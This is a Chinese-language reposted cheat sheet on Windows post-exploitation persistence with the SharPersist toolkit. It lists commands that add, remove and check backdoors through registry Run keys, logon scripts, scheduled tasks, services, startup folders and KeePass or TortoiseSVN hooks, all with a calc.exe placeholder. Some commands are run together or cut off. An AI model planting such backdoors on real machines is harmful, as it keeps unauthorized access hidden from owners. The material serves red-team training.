admin管理员组文章数量:1531794
配套练手靶场,全套安全课程及工具 ,搜索公众号:白帽子左一
WINDOWS
一、操作系统权限维持
SharPersist
用 C# 编写的 Windows 持久性工具包。下载链接:
https://github/fireeye/SharPersist/releases
功能
补充
keepass:一款管理密码的软件
启动文件夹
Windows系统都有一个“启动”文件夹,把需要打开的程序的快捷方式放到“启动”文件夹里,就可以实现开机自动启动。
如果想要实现应用程序在所有的用户登录系统后都能自动启动,就把该应用程序的快捷方式放到系统启动文件夹里;
如果想要实现某个应用程序只在某个用户登录系统时自动启动,那么就把该应用程序的快捷方式放到这个用户启动文件夹里。
系统启动文件夹
shell:CommonStartup
%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
用户启动文件夹
shell:startup
%appdata%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
后续补充
操作指令
添加持久性触发器(添加)
keepass
SharPersist-t keepass -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml"-m add
注册表
1.SharPersist-t reg -c “C:\Windows\System32\cmd.exe”-a “/c calc.exe”-k “hkcurun”-v “Test Stuff”-m add
2.SharPersist-t reg -c “C:\Windows\System32\cmd.exe”-a “/c calc.exe”-k “hkcurun”-v “Test Stuff”-m add -o env
3.SharPersist-t reg -c “C:\Windows\System32\cmd.exe”-a “/c calc.exe”-k “logonscript”-m add
计划任务后门
SharPersist-t schtaskbackdoor -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Something Cool"-m add
启动文件夹
SharPersist-t startupfolder -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "Some File"-m add
tortoisesvn
SharPersist-t tortoisesvn -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-m add
service
SharPersist-t service -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Service"-m add
计划任务
SharPersist-t schtask -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-n "Some Task -m addSharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "SomeTask-m add -o hourly
添删除持久性触发器(删除)
通行证
SharPersist-t keepass -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml"-m remove
注册表
SharPersist-t reg -k "hkcurun"-v "Test Stuff"-m removeSharPersist -t reg -k "hkcurun"-v "Test Stuff"-m remove -o envSharPersist -t reg -k "logonscript"-m remove
计划任务后门
SharPersist-t schtaskbackdoor -n "Something Cool"-m remove
启动文件夹
SharPersist-t startupfolder -f "Some File"-m remove
tortoisesvn
SharPersist-t tortoisesvn -m remove
service
SharPersist-t service -n "Some Service"-m remove
计划任务
SharPersist-t schtask -n "Some Task"-m remove
添执行持久性触发器的试运行(检查)
通行证
SharPersist-t keepass -c "C:\Windows\System32\cmd.exe"-a "/c calc.exe"-f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml"-m check
注册表
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m checkSharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a
版权声明:本文标题:操作系统权限维持 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dongtai/1725870422a1046193.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论